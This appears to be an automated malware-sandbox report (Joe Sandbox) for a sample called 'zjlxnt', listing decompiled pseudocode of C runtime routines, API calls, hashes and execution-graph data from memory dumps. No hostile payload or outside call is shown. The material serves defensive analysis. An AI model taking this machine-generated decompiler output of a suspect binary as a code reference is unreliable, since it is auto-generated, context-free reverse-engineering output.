                                                          0x00403240
                                                          0x00403239
                                                          0x00403239
                                                          0x00403239
                                                          0x00403243
                                                          0x00403247
                                                          0x0040324a
                                                          0x0040324b
                                                          0x0040324c
                                                          0x0040324d
                                                          0x00403250
                                                          0x00403259
                                                          0x00403259
                                                          0x0040325c
                                                          0x00403292
                                                          0x0040325e
                                                          0x0040325e
                                                          0x0040325e
                                                          0x00403261
                                                          0x00403278
                                                          0x00403278
                                                          0x00403261
                                                          0x00403297
                                                          0x004032a1
                                                          0x004032ad
                                                          0x0040316b
                                                          0x0040316b
                                                          0x00403170
                                                          0x00403171
                                                          0x004031ab
                                                          0x004031b2
                                                          0x004031f6
                                                          0x004031f6
                                                          0x004031fd
                                                          0x0040320c
                                                          0x0040320f
                                                          0x0040321b
                                                          0x0040321b
                                                          0x0040315d
                                                          0x0040313f
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040310e

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.316635019.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.316628734.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.316670602.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.316687505.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_zjlxnt.jbxd
                                                          Similarity
                                                          • API ID: AdjustPointer
                                                          • String ID:
                                                          • API String ID: 1740715915-0
                                                          • Opcode ID: 793730f094be1da67d355f7f23bf5be4a42a2e349e64329e165711bbad5115bb
                                                          • Instruction ID: 0eee83ce428f6a2d5fb7d7f8cdde5a3b4e88414a42be58dcce2751d31cc34b02
                                                          • Opcode Fuzzy Hash: 793730f094be1da67d355f7f23bf5be4a42a2e349e64329e165711bbad5115bb
                                                          • Instruction Fuzzy Hash: FC510172600302AFDB289F55C941BABBBA8EF58306F14417FE9056B2D1D739EE41C798
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E00408798(intOrPtr* _a4, intOrPtr _a8, void* _a12, intOrPtr _a16) {
                                                          				intOrPtr _t17;
                                                          				intOrPtr _t18;
                                                          				intOrPtr _t20;
                                                          				intOrPtr _t30;
                                                          				char _t32;
                                                          				intOrPtr _t40;
                                                          				intOrPtr* _t42;
                                                          				intOrPtr _t43;
                                                          
                                                          				_t42 = _a4;
                                                          				if(_t42 != 0) {
                                                          					_t32 = 0;
                                                          					__eflags =  *_t42;
                                                          					if( *_t42 != 0) {
                                                          						_t17 = E00409A30(_a16, 0, _t42, 0xffffffff, 0, 0, 0, 0);
                                                          						__eflags = _t17;
                                                          						if(_t17 != 0) {
                                                          							_t40 = _a8;
                                                          							__eflags = _t17 -  *((intOrPtr*)(_t40 + 0xc));
                                                          							if(__eflags <= 0) {
                                                          								L11:
                                                          								_t18 = E00408D53(_a16, _t42,  *((intOrPtr*)(_t40 + 8)),  *((intOrPtr*)(_t40 + 0xc)));
                                                          								__eflags = _t18;
                                                          								if(_t18 != 0) {
                                                          									 *((intOrPtr*)(_t40 + 0x10)) = _t18 - 1;
                                                          									_t20 = 0;
                                                          									__eflags = 0;
                                                          								} else {
                                                          									E00407B10(GetLastError());
                                                          									_t20 =  *((intOrPtr*)(E00407B6A()));
                                                          								}
                                                          								L14:
                                                          								return _t20;
                                                          							}
                                                          							_t20 = E00408DD0(_t40, __eflags, _t17);
                                                          							__eflags = _t20;
                                                          							if(_t20 != 0) {
                                                          								goto L14;
                                                          							}
                                                          							goto L11;
                                                          						}
                                                          						E00407B10(GetLastError());
                                                          						return  *((intOrPtr*)(E00407B6A()));
                                                          					}
                                                          					_t43 = _a8;
                                                          					__eflags =  *((intOrPtr*)(_t43 + 0xc));
                                                          					if(__eflags != 0) {
                                                          						L6:
                                                          						 *((char*)( *((intOrPtr*)(_t43 + 8)))) = _t32;
                                                          						L2:
                                                          						 *((intOrPtr*)(_t43 + 0x10)) = _t32;
                                                          						return 0;
                                                          					}
                                                          					_t30 = E00408DD0(_t43, __eflags, 1);
                                                          					__eflags = _t30;
                                                          					if(_t30 != 0) {
                                                          						return _t30;
                                                          					}
                                                          					goto L6;
                                                          				}
                                                          				_t43 = _a8;
                                                          				E00408DB6(_t43);
                                                          				_t32 = 0;
                                                          				 *((intOrPtr*)(_t43 + 8)) = 0;
                                                          				 *((intOrPtr*)(_t43 + 0xc)) = 0;
                                                          				goto L2;
                                                          			}











                                                          0x0040879f
                                                          0x004087a4
                                                          0x004087c2
                                                          0x004087c4
                                                          0x004087c7
                                                          0x004087f0
                                                          0x004087f8
                                                          0x004087fa
                                                          0x00408813
                                                          0x00408816
                                                          0x00408819
                                                          0x00408827
                                                          0x00408834
                                                          0x00408839
                                                          0x0040883b
                                                          0x00408854
                                                          0x00408857
                                                          0x00408857
                                                          0x0040883d
                                                          0x00408844
                                                          0x0040884f
                                                          0x0040884f
                                                          0x00408859
                                                          0x00000000
                                                          0x00408859
                                                          0x0040881e
                                                          0x00408823
                                                          0x00408825
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00408825
                                                          0x00408803
                                                          0x00000000
                                                          0x0040880e
                                                          0x004087c9
                                                          0x004087cc
                                                          0x004087cf
                                                          0x004087de
                                                          0x004087e1
                                                          0x004087b8
                                                          0x004087b8
                                                          0x00000000
                                                          0x004087bb
                                                          0x004087d5
                                                          0x004087da
                                                          0x004087dc
                                                          0x0040885d
                                                          0x0040885d
                                                          0x00000000
                                                          0x004087dc
                                                          0x004087a6
                                                          0x004087ab
                                                          0x004087b0
                                                          0x004087b2
                                                          0x004087b5
                                                          0x00000000

                                                          APIs
                                                            • Part of subcall function 00409A30: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0040DBAF,?,00000000,-00000008), ref: 00409A91
                                                          • GetLastError.KERNEL32 ref: 004087FC
                                                          • __dosmaperr.LIBCMT ref: 00408803
                                                          • GetLastError.KERNEL32(?,?,?,?), ref: 0040883D
                                                          • __dosmaperr.LIBCMT ref: 00408844
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.316635019.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.316628734.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.316670602.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.316687505.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_zjlxnt.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                          • String ID:
                                                          • API String ID: 1913693674-0
                                                          • Opcode ID: 2380bed64d21907d5dfc4457df022d76c3bcdbd0a8f3fafbb88adcd9f318a4a4
                                                          • Instruction ID: 972515f50ef534669a89da3669eed9dd7ed1a2d4ff75e1d4c3f63b72d9058425
                                                          • Opcode Fuzzy Hash: 2380bed64d21907d5dfc4457df022d76c3bcdbd0a8f3fafbb88adcd9f318a4a4
                                                          • Instruction Fuzzy Hash: 0B21C732600205AFCB10BF628D8086B77A8EF54368710C93EF995B72D0DF38EC408799
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 17%
                                                          			E00409AD3() {
                                                          				intOrPtr _v8;
                                                          				signed int _v12;
                                                          				WCHAR* _t5;
                                                          				void* _t6;
                                                          				intOrPtr _t9;
                                                          				WCHAR* _t19;
                                                          				WCHAR* _t26;
                                                          				WCHAR* _t29;
                                                          
                                                          				_push(_t21);
                                                          				_t5 = GetEnvironmentStringsW();
                                                          				_t29 = _t5;
                                                          				if(_t29 != 0) {
                                                          					_t6 = E00409A9C(_t29);
                                                          					_t19 = 0;
                                                          					_v12 = _t6 - _t29 >> 1;
                                                          					_t9 = E00409A30(0, 0, _t29, _t6 - _t29 >> 1, 0, 0, 0, 0);
                                                          					_v8 = _t9;
                                                          					if(_t9 != 0) {
                                                          						_t26 = E0040A6A3(_t9);
                                                          						_push(0);
                                                          						if(_t26 != 0) {
                                                          							_push(0);
                                                          							_push(_v8);
                                                          							_push(_t26);
                                                          							_push(_v12);
                                                          							_push(_t29);
                                                          							_push(0);
                                                          							_push(0);
                                                          							if(E00409A30() != 0) {
                                                          								E00408694(0);
                                                          								_t19 = _t26;
                                                          							} else {
                                                          								E00408694(_t26);
                                                          							}
                                                          							FreeEnvironmentStringsW(_t29);
                                                          							_t5 = _t19;
                                                          						} else {
                                                          							E00408694();
                                                          							FreeEnvironmentStringsW(_t29);
                                                          							_t5 = 0;
                                                          						}
                                                          					} else {
                                                          						FreeEnvironmentStringsW(_t29);
                                                          						_t5 = 0;
                                                          					}
                                                          				}
                                                          				return _t5;
                                                          			}











                                                          0x00409ad9
                                                          0x00409adb
                                                          0x00409ae1
                                                          0x00409ae5
                                                          0x00409aed
                                                          0x00409af2
                                                          0x00409b00
                                                          0x00409b03
                                                          0x00409b0b
                                                          0x00409b10
                                                          0x00409b24
                                                          0x00409b27
                                                          0x00409b2a
                                                          0x00409b3d
                                                          0x00409b3e
                                                          0x00409b41
                                                          0x00409b42
                                                          0x00409b45
                                                          0x00409b46
                                                          0x00409b47
                                                          0x00409b52
                                                          0x00409b5d
                                                          0x00409b62
                                                          0x00409b54
                                                          0x00409b55
                                                          0x00409b55
                                                          0x00409b66
                                                          0x00409b6c
                                                          0x00409b2c
                                                          0x00409b2c
                                                          0x00409b33
                                                          0x00409b39
                                                          0x00409b39
                                                          0x00409b12
                                                          0x00409b13
                                                          0x00409b19
                                                          0x00409b19
                                                          0x00409b6f
                                                          0x00409b72

                                                          APIs
                                                          • GetEnvironmentStringsW.KERNEL32 ref: 00409ADB
                                                            • Part of subcall function 00409A30: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0040DBAF,?,00000000,-00000008), ref: 00409A91
                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00409B13
                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00409B33
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.316635019.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.316628734.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.316670602.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.316687505.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_zjlxnt.jbxd
                                                          Similarity
                                                          • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                          • String ID:
                                                          • API String ID: 158306478-0
                                                          • Opcode ID: 570d5e73df3551112cc611fb2ac3c1a239d983844ef26c754e9ea3f5cc420c08
                                                          • Instruction ID: 31a707e6441ba5eb713ba2804f900e652010e3fd9620adc368c091045ee47f5b
                                                          • Opcode Fuzzy Hash: 570d5e73df3551112cc611fb2ac3c1a239d983844ef26c754e9ea3f5cc420c08
                                                          • Instruction Fuzzy Hash: 5411E5A1A016197EE71127B2AC89CBF7E6CEE842A8710043BF541B1183EE3CED41857D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E0040F118(void* _a4, long _a8, DWORD* _a12) {
                                                          				void* _t13;
                                                          
                                                          				_t13 = WriteConsoleW( *0x4188a0, _a4, _a8, _a12, 0);
                                                          				if(_t13 == 0 && GetLastError() == 6) {
                                                          					E0040F101();
                                                          					E0040F0C3();
                                                          					_t13 = WriteConsoleW( *0x4188a0, _a4, _a8, _a12, _t13);
                                                          				}
                                                          				return _t13;
                                                          			}




                                                          0x0040f135
                                                          0x0040f139
                                                          0x0040f146
                                                          0x0040f14b
                                                          0x0040f166
                                                          0x0040f166
                                                          0x0040f16c

                                                          APIs
                                                          • WriteConsoleW.KERNEL32(00000000,00000000,00404AFF,00000000,00000000,?,0040E78E,00000000,00000001,?,?,?,0040CBF2,?,00000000,00000000), ref: 0040F12F
                                                          • GetLastError.KERNEL32(?,0040E78E,00000000,00000001,?,?,?,0040CBF2,?,00000000,00000000,?,?,?,0040D1CC,00000000), ref: 0040F13B
                                                            • Part of subcall function 0040F101: CloseHandle.KERNEL32(FFFFFFFE,0040F14B,?,0040E78E,00000000,00000001,?,?,?,0040CBF2,?,00000000,00000000,?,?), ref: 0040F111
                                                          • ___initconout.LIBCMT ref: 0040F14B
                                                            • Part of subcall function 0040F0C3: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0040F0F2,0040E77B,?,?,0040CBF2,?,00000000,00000000,?), ref: 0040F0D6
                                                          • WriteConsoleW.KERNEL32(00000000,00000000,00404AFF,00000000,?,0040E78E,00000000,00000001,?,?,?,0040CBF2,?,00000000,00000000,?), ref: 0040F160
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.316635019.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.316628734.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.316670602.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.316687505.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_zjlxnt.jbxd
                                                          Similarity
                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                          • String ID:
                                                          • API String ID: 2744216297-0
                                                          • Opcode ID: fa38966b5174c12e011f1d29460e60b6ccd418f6c39747bd92832199a799d301
                                                          • Instruction ID: 23ad264d729cb3fda557c1c1da3f34fdf71add76c7ca5d843bb2f0a27f73c11d
                                                          • Opcode Fuzzy Hash: fa38966b5174c12e011f1d29460e60b6ccd418f6c39747bd92832199a799d301
                                                          • Instruction Fuzzy Hash: 27F01C3A901154FBCF322F95DC04DCA3F66EF483A1B408035FE08A5570CA368C60DBA9
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 65%
                                                          			E004036E0(void* __ecx, void* __edx, signed char* _a4, signed char* _a8, intOrPtr _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
                                                          				signed int _v8;
                                                          				signed int _v12;
                                                          				intOrPtr* _v16;
                                                          				signed int _v20;
                                                          				char _v24;
                                                          				intOrPtr _v28;
                                                          				signed int _v36;
                                                          				void* _v40;
                                                          				intOrPtr _v44;
                                                          				signed int _v48;
                                                          				intOrPtr _v56;
                                                          				void _v60;
                                                          				signed char* _v68;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				void* _t74;
                                                          				void* _t75;
                                                          				char _t76;
                                                          				signed char _t78;
                                                          				signed int _t80;
                                                          				signed char* _t81;
                                                          				signed int _t82;
                                                          				signed int _t83;
                                                          				intOrPtr* _t87;
                                                          				void* _t90;
                                                          				signed char* _t93;
                                                          				intOrPtr* _t96;
                                                          				signed char _t97;
                                                          				intOrPtr _t98;
                                                          				intOrPtr _t99;
                                                          				intOrPtr* _t101;
                                                          				signed int _t102;
                                                          				signed int _t103;
                                                          				signed char _t108;
                                                          				signed char* _t111;
                                                          				signed int _t112;
                                                          				signed char* _t116;
                                                          				void* _t121;
                                                          				signed int _t123;
                                                          				void* _t130;
                                                          				void* _t131;
                                                          
                                                          				_t110 = __edx;
                                                          				_t100 = __ecx;
                                                          				_t96 = _a4;
                                                          				if( *_t96 == 0x80000003) {
                                                          					return _t74;
                                                          				} else {
                                                          					_push(_t121);
                                                          					_t75 = E00402403(_t96, __ecx, __edx, _t121);
                                                          					if( *((intOrPtr*)(_t75 + 8)) != 0) {
                                                          						__imp__EncodePointer(0);
                                                          						_t121 = _t75;
                                                          						if( *((intOrPtr*)(E00402403(_t96, __ecx, __edx, _t121) + 8)) != _t121 &&  *_t96 != 0xe0434f4d &&  *_t96 != 0xe0434352) {
                                                          							_t87 = E00402881(__edx, _t121, _t96, _a8, _a12, _a16, _a20, _a28, _a32);
                                                          							_t130 = _t130 + 0x1c;
                                                          							if(_t87 != 0) {
                                                          								L16:
                                                          								return _t87;
                                                          							}
                                                          						}
                                                          					}
                                                          					_t76 = _a20;
                                                          					_v24 = _t76;
                                                          					_v20 = 0;
                                                          					if( *((intOrPtr*)(_t76 + 0xc)) > 0) {
                                                          						_push(_a28);
                                                          						E004027B4(_t96, _t100, 0, _t121,  &_v40,  &_v24, _a24, _a16, _t76);
                                                          						_t112 = _v36;
                                                          						_t131 = _t130 + 0x18;
                                                          						_t87 = _v40;
                                                          						_v16 = _t87;
                                                          						_v8 = _t112;
                                                          						if(_t112 < _v28) {
                                                          							_t102 = _t112 * 0x14;
                                                          							_v12 = _t102;
                                                          							do {
                                                          								_t103 = 5;
                                                          								_t90 = memcpy( &_v60,  *((intOrPtr*)( *_t87 + 0x10)) + _t102, _t103 << 2);
                                                          								_t131 = _t131 + 0xc;
                                                          								if(_v60 <= _t90 && _t90 <= _v56) {
                                                          									_t93 = _v44 + 0xfffffff0 + (_v48 << 4);
                                                          									_t108 = _t93[4];
                                                          									if(_t108 == 0 ||  *((char*)(_t108 + 8)) == 0) {
                                                          										if(( *_t93 & 0x00000040) == 0) {
                                                          											_push(0);
                                                          											_push(1);
                                                          											E004032BB(_t112, _t96, _a8, _a12, _a16, _a20, _t93, 0,  &_v60, _a28, _a32);
                                                          											_t112 = _v8;
                                                          											_t131 = _t131 + 0x30;
                                                          										}
                                                          									}
                                                          								}
                                                          								_t112 = _t112 + 1;
                                                          								_t87 = _v16;
                                                          								_t102 = _v12 + 0x14;
                                                          								_v8 = _t112;
                                                          								_v12 = _t102;
                                                          							} while (_t112 < _v28);
                                                          						}
                                                          						goto L16;
                                                          					}
                                                          					E0040623E(_t96, _t100, _t110, _t121);
                                                          					asm("int3");
                                                          					_t111 = _v68;
                                                          					_push(_t96);
                                                          					_push(_t121);
                                                          					_push(0);
                                                          					_t78 = _t111[4];
                                                          					if(_t78 == 0) {
                                                          						L41:
                                                          						_t80 = 1;
                                                          					} else {
                                                          						_t101 = _t78 + 8;
                                                          						if( *_t101 == 0) {
                                                          							goto L41;
                                                          						} else {
                                                          							_t116 = _a4;
                                                          							if(( *_t111 & 0x00000080) == 0 || ( *_t116 & 0x00000010) == 0) {
                                                          								_t97 = _t116[4];
                                                          								_t123 = 0;
                                                          								if(_t78 == _t97) {
                                                          									L33:
                                                          									if(( *_t116 & 0x00000002) == 0 || ( *_t111 & 0x00000008) != 0) {
                                                          										_t81 = _a8;
                                                          										if(( *_t81 & 0x00000001) == 0 || ( *_t111 & 0x00000001) != 0) {
                                                          											if(( *_t81 & 0x00000002) == 0 || ( *_t111 & 0x00000002) != 0) {
                                                          												_t123 = 1;
                                                          											}
                                                          										}
                                                          									}
                                                          									_t80 = _t123;
                                                          								} else {
                                                          									_t59 = _t97 + 8; // 0x6e
                                                          									_t82 = _t59;
                                                          									while(1) {
                                                          										_t98 =  *_t101;
                                                          										if(_t98 !=  *_t82) {
                                                          											break;
                                                          										}
                                                          										if(_t98 == 0) {
                                                          											L29:
                                                          											_t83 = _t123;
                                                          										} else {
                                                          											_t99 =  *((intOrPtr*)(_t101 + 1));
                                                          											if(_t99 !=  *((intOrPtr*)(_t82 + 1))) {
                                                          												break;
                                                          											} else {
                                                          												_t101 = _t101 + 2;
                                                          												_t82 = _t82 + 2;
                                                          												if(_t99 != 0) {
                                                          													continue;
                                                          												} else {
                                                          													goto L29;
                                                          												}
                                                          											}
                                                          										}
                                                          										L31:
                                                          										if(_t83 == 0) {
                                                          											goto L33;
                                                          										} else {
                                                          											_t80 = 0;
                                                          										}
                                                          										goto L42;
                                                          									}
                                                          									asm("sbb eax, eax");
                                                          									_t83 = _t82 | 0x00000001;
                                                          									goto L31;
                                                          								}
                                                          							} else {
                                                          								goto L41;
                                                          							}
                                                          						}
                                                          					}
                                                          					L42:
                                                          					return _t80;
                                                          				}
                                                          			}













































                                                          0x004036e0
                                                          0x004036e0
                                                          0x004036e7
                                                          0x004036f0
                                                          0x0040380f
                                                          0x004036f6
                                                          0x004036f6
                                                          0x004036f8
                                                          0x00403702
                                                          0x00403705
                                                          0x0040370b
                                                          0x00403715
                                                          0x0040373a
                                                          0x0040373f
                                                          0x00403744
                                                          0x0040380b
                                                          0x00000000
                                                          0x0040380c
                                                          0x00403744
                                                          0x00403715
                                                          0x0040374a
                                                          0x0040374d
                                                          0x00403750
                                                          0x00403756
                                                          0x0040375c
                                                          0x0040376e
                                                          0x00403773
                                                          0x00403776
                                                          0x00403779
                                                          0x0040377c
                                                          0x0040377f
                                                          0x00403785
                                                          0x0040378b
                                                          0x0040378e
                                                          0x00403791
                                                          0x004037a0
                                                          0x004037a1
                                                          0x004037a1
                                                          0x004037a6
                                                          0x004037b9
                                                          0x004037bb
                                                          0x004037c0
                                                          0x004037cb
                                                          0x004037cd
                                                          0x004037cf
                                                          0x004037eb
                                                          0x004037f0
                                                          0x004037f3
                                                          0x004037f3
                                                          0x004037cb
                                                          0x004037c0
                                                          0x004037f9
                                                          0x004037fa
                                                          0x004037fd
                                                          0x00403800
                                                          0x00403803
                                                          0x00403806
                                                          0x00403791
                                                          0x00000000
                                                          0x00403785
                                                          0x00403810
                                                          0x00403815
                                                          0x00403819
                                                          0x0040381c
                                                          0x0040381d
                                                          0x0040381e
                                                          0x0040381f
                                                          0x00403824
                                                          0x0040389c
                                                          0x0040389e
                                                          0x00403826
                                                          0x00403826
                                                          0x0040382c
                                                          0x00000000
                                                          0x0040382e
                                                          0x00403831
                                                          0x00403834
                                                          0x0040383b
                                                          0x0040383e
                                                          0x00403842
                                                          0x00403874
                                                          0x00403877
                                                          0x0040387e
                                                          0x00403884
                                                          0x0040388e
                                                          0x00403897
                                                          0x00403897
                                                          0x0040388e
                                                          0x00403884
                                                          0x00403898
                                                          0x00403844
                                                          0x00403844
                                                          0x00403844
                                                          0x00403847
                                                          0x00403847
                                                          0x0040384b
                                                          0x00000000
                                                          0x00000000
                                                          0x0040384f
                                                          0x00403863
                                                          0x00403863
                                                          0x00403851
                                                          0x00403851
                                                          0x00403857
                                                          0x00000000
                                                          0x00403859
                                                          0x00403859
                                                          0x0040385c
                                                          0x00403861
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00403861
                                                          0x00403857
                                                          0x0040386c
                                                          0x0040386e
                                                          0x00000000
                                                          0x00403870
                                                          0x00403870
                                                          0x00403870
                                                          0x00000000
                                                          0x0040386e
                                                          0x00403867
                                                          0x00403869
                                                          0x00000000
                                                          0x00403869
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00403834
                                                          0x0040382c
                                                          0x0040389f
                                                          0x004038a3
                                                          0x004038a3

                                                          APIs
                                                          • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00403705
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.316635019.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.316628734.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.316670602.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.316687505.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_zjlxnt.jbxd
                                                          Similarity
                                                          • API ID: EncodePointer
                                                          • String ID: MOC$RCC
                                                          • API String ID: 2118026453-2084237596
                                                          • Opcode ID: 00d0e1f1b77c4b1278f63ae4e7bf7ddda63b466b9ddc3a445dd5d16418ad00af
                                                          • Instruction ID: 26e6ef2ac78d9669040f947cc7e512453069a3445d94063a297bb2325bcafb7a
                                                          • Opcode Fuzzy Hash: 00d0e1f1b77c4b1278f63ae4e7bf7ddda63b466b9ddc3a445dd5d16418ad00af
                                                          • Instruction Fuzzy Hash: 6B419CB2900209AFCF16DF94CD81AEE7FB9BF08305F1480AAF90477291D3399A51DB54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E00405B41() {
                                                          
                                                          				 *0x418e7c = GetCommandLineA();
                                                          				 *0x418e80 = GetCommandLineW();
                                                          				return 1;
                                                          			}



                                                          0x00405b47
                                                          0x00405b52
                                                          0x00405b59

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.316635019.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.316628734.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.316670602.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.316687505.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_zjlxnt.jbxd
                                                          Similarity
                                                          • API ID: CommandLine
                                                          • String ID: 04Y
                                                          • API String ID: 3253501508-1924605477
                                                          • Opcode ID: f20c8cddc90e79d8550de3671dd31650b1c90833b942a4a77989363871e03413
                                                          • Instruction ID: f7364bfb3bd3cd80012c35476f0112e814084956367fd3282b47edc9b2285101
                                                          • Opcode Fuzzy Hash: f20c8cddc90e79d8550de3671dd31650b1c90833b942a4a77989363871e03413
                                                          • Instruction Fuzzy Hash: 8AB04878C403448B87008F30A8182C83EA4B31C202380C07ADA29C2A30EB754044DF18
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Execution Graph

                                                          Execution Coverage:11.7%
                                                          Dynamic/Decrypted Code Coverage:58.5%
                                                          Signature Coverage:4.8%
                                                          Total number of Nodes:188
                                                          Total number of Limit Nodes:14
                                                          execution_graph 30694 5213880 30695 5213885 DuplicateHandle 30694->30695 30696 5213916 30695->30696 30697 401708 30702 401e16 SetUnhandledExceptionFilter 30697->30702 30699 40170d _com_raise_error 30703 4051cb 41 API calls _com_raise_error 30699->30703 30701 401718 30702->30699 30703->30701 30704 5210448 30706 521044d 30704->30706 30705 521046b 30706->30705 30708 52112c6 30706->30708 30709 52112de 30708->30709 30710 521138f 30709->30710 30713 5213c30 30709->30713 30718 5213be8 30709->30718 30710->30706 30714 5213c48 30713->30714 30715 5214536 30714->30715 30723 5215100 30714->30723 30729 52147e4 30714->30729 30715->30709 30720 5213bec 30718->30720 30719 5213c06 30719->30709 30720->30719 30721 5215100 KiUserCallbackDispatcher 30720->30721 30722 52147e4 KiUserCallbackDispatcher 30720->30722 30721->30720 30722->30720 30724 521510c 30723->30724 30725 5215316 30724->30725 30735 5217630 30724->30735 30741 5217680 30724->30741 30746 5217670 30724->30746 30725->30714 30730 52147ef 30729->30730 30731 5215316 30730->30731 30732 5217630 KiUserCallbackDispatcher 30730->30732 30733 5217670 KiUserCallbackDispatcher 30730->30733 30734 5217680 KiUserCallbackDispatcher 30730->30734 30731->30714 30732->30731 30733->30731 30734->30731 30736 52175cc 30735->30736 30737 52176a8 30735->30737 30736->30725 30738 52176c5 30737->30738 30751 5217830 30737->30751 30755 521781f 30737->30755 30738->30725 30742 5217681 30741->30742 30743 52176c5 30742->30743 30744 5217830 KiUserCallbackDispatcher 30742->30744 30745 521781f KiUserCallbackDispatcher 30742->30745 30743->30725 30744->30743 30745->30743 30747 5217673 30746->30747 30748 52176c5 30747->30748 30749 5217830 KiUserCallbackDispatcher 30747->30749 30750 521781f KiUserCallbackDispatcher 30747->30750 30748->30725 30749->30748 30750->30748 30752 521783d 30751->30752 30753 5217876 30752->30753 30762 5214dfc 30752->30762 30753->30738 30756 5217897 30755->30756 30757 5217823 30755->30757 30758 52178e8 30756->30758 30760 5214e30 KiUserCallbackDispatcher 30756->30760 30759 5217876 30757->30759 30761 5214dfc KiUserCallbackDispatcher 30757->30761 30759->30738 30760->30758 30761->30759 30763 5214e07 30762->30763 30765 52178e8 30763->30765 30766 5214e30 30763->30766 30765->30765 30767 5214e3b 30766->30767 30770 5214e40 30767->30770 30769 5217957 30769->30765 30771 5214e4b 30770->30771 30776 5217b24 30771->30776 30773 5217e64 30774 521808c 30773->30774 30775 5217680 KiUserCallbackDispatcher 30773->30775 30774->30769 30775->30774 30777 5217b2f 30776->30777 30778 521a8b2 30777->30778 30780 521a901 30777->30780 30778->30773 30781 521a953 30780->30781 30782 521a95e KiUserCallbackDispatcher 30781->30782 30783 521a988 30781->30783 30782->30783 30783->30778 30797 5213658 30798 5213659 GetCurrentProcess 30797->30798 30799 52136d2 GetCurrentThread 30798->30799 30800 52136cb 30798->30800 30801 5213708 30799->30801 30802 521370f GetCurrentProcess 30799->30802 30800->30799 30801->30802 30803 5213745 30802->30803 30806 5213be8 KiUserCallbackDispatcher 30803->30806 30808 5213808 30803->30808 30804 521376d GetCurrentThreadId 30805 521379e 30804->30805 30806->30804 30809 521380c 30808->30809 30809->30804 30810 40171a 30811 401726 __FrameHandler3::FrameUnwindToState 30810->30811 30836 401992 30811->30836 30813 40172d 30814 401880 30813->30814 30823 401757 